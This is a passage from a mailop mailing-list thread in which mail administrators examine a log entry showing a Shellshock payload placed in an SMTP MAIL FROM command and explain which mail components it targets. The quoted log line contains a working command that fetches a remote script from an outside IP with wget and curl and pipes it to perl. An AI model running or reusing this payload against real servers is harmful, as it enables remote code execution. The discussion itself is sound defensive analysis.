Found also one in logs:
warning: Illegal address syntax from
newcloud.thevinylspectrum.com[104.200.146.132] in MAIL command: <() { :; };
wget -qO - 136.243.150.82/qmx|perl;curl -sS 136.243.150.82/qmx|perl>
What is special about it, that it is only identified by one security vendor:
https://www.virustotal.com/gui/url/1d18ccc49a7f430d7fb74b64ac66af7710161b14fc0b834c44cde4a2f0495d31
Am 15. Januar 2023 um 03:57:40, Ángel via mailop ([email protected]) schrieb:
On 2023-01-14 at 17:33 +0200, Mary wrote:
> Thank you, I'll take a closer look, because Shellshock implies that
> somehow the SMTPD executes a bash script, which I find highly
> unlikely. That is why I thought they are trying to exploit something
> further down the pipeline (Logstash, Prometheus, etc).
The command is a normal shellshock payload. It would seems to target
the case where the mail server or an MDA sets an environment variable
with the MAIL FROM value and then executes a command through bash.
This could be the execution of a milter, a procmail... courier also
extensively uses environment variables between their programs.
The most difficult part is that a bash shell is executed... being an
old version which not patched for this 2014 vulnerability.
_______________________________________________
mailop mailing list
[email protected]
https://list.mailop.org/listinfo/mailop
_______________________________________________
mailop mailing list
[email protected]
https://list.mailop.org/listinfo/mailop
